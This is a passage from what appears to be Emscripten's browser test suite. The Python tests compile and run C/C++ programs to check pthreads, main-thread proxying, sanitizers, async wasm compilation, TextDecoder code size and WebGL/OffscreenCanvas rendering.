# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ASSERTIONS'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
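# Test POSIX unistd I/O (tests/unistd/io.c) in a pthread build with WASM_BIGINT enabled.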
@requires_threads
def test_pthread_unistd_io_bigint(self):
self.btest_exit(path_from_root('tests', 'unistd', 'io.c'), 0, args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'WASM_BIGINT'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'INITIAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
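# Test dispatching to a pthread after exit (tests/pthread/test_pthread_dispatch_after_exit.c).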
@requires_threads
def test_pthread_dispatch_after_exit(self):
self.btest_exit(path_from_root('tests', 'pthread', 'test_pthread_dispatch_after_exit.c'), 0, args=['-s', 'USE_PTHREADS'])
# Test customizing the URL that the pthread worker script (worker.js) is loaded from (via Module.locateFile)
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
ensure_dir('cdn')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
''')
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), no deadlock occurs.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'INITIAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that proxying user code operations from pthreads to the main thread works
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest(path_from_root('tests', 'pthread', 'call_async.c'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js'), '-s', 'EXPORTED_FUNCTIONS=[_main,_malloc]'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
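# Same global data initialization test as above, but with synchronous wasm compilation (-s WASM_ASYNC_COMPILATION=0).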
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'PTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
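# Test the UTF-8 related runtime functions when called from pthreads (tests/pthread/test_pthread_utf8_funcs.cpp).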
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX) functionality to wake all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'INITIAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME'], also_asmjs=True)
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS'])
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'STACK_OVERFLOW_CHECK=2', '-s', 'TOTAL_STACK=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
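# Test LeakSanitizer (-fsanitize=leak) in pthread builds, in both leaking and non-leaking variants.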
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
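# Test that AddressSanitizer reports a use-after-free in a pthread build (tests/pthread/test_pthread_asan_use_after_free.cpp).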
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'INITIAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
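# Test that exiting from a pthread build with EXIT_RUNTIME set reports the exit status via onExit.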
@requires_threads
def test_pthread_exit_process(self):
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-s', 'EXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
@requires_threads
def test_pthread_no_exit_process(self):
# Same as above but without EXIT_RUNTIME. In this case we don't expect onExit to
# ever be called.
args = ['-s', 'USE_PTHREADS',
'-s', 'PROXY_TO_PTHREAD',
'-s', 'PTHREAD_POOL_SIZE=2',
'-O0']
args += ['--pre-js', path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.pre.js')]
self.btest(path_from_root('tests', 'core', 'pthread', 'test_pthread_exit_runtime.c'), expected='43', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
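# Test asynchronous EM_ASM calls to the main thread (tests/core/test_main_thread_async_em_asm.cpp) under PROXY_TO_PTHREAD.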
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(path_from_root('tests', 'core', 'test_main_thread_async_em_asm.cpp'), expected=0, args=['-O3', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'ASSERTIONS'])
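# Test blocking EM_ASM behaviour under PROXY_TO_PTHREAD (tests/browser/test_em_asm_blocking.cpp).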
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_test_file('page.html',
open(path_from_root('tests', 'browser', 'test_em_asm_blocking.html')).read())
self.compile_btest([path_from_root('tests', 'browser', 'test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn calls the signal handler set by signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'])
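# Test accessing canvas style properties when the program runs proxied in a worker (--proxy-to-worker).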
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
self.compile_btest([path_from_root('tests', 'in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest_exit('binaryen_async.c', expected=expect, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', expected=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
self.compile_btest([path_from_root('tests/manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([path_from_root('tests', 'browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
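# Compare generated code size with TEXTDECODER=0 (fallback decoder only), the default (TextDecoder plus a
# fallback), and TEXTDECODER=2 (TextDecoder required, no fallback); the no-fallback build should be the smallest.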
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5368), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@disabled('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# we may need to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env arg.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'OFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES2'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it by using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
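# Test resizing an OffscreenCanvas from the main thread in pthread builds, across combinations of
# PROXY_TO_PTHREAD, blocking loops and OFFSCREENCANVAS_SUPPORT/OFFSCREEN_FRAMEBUFFER.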
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
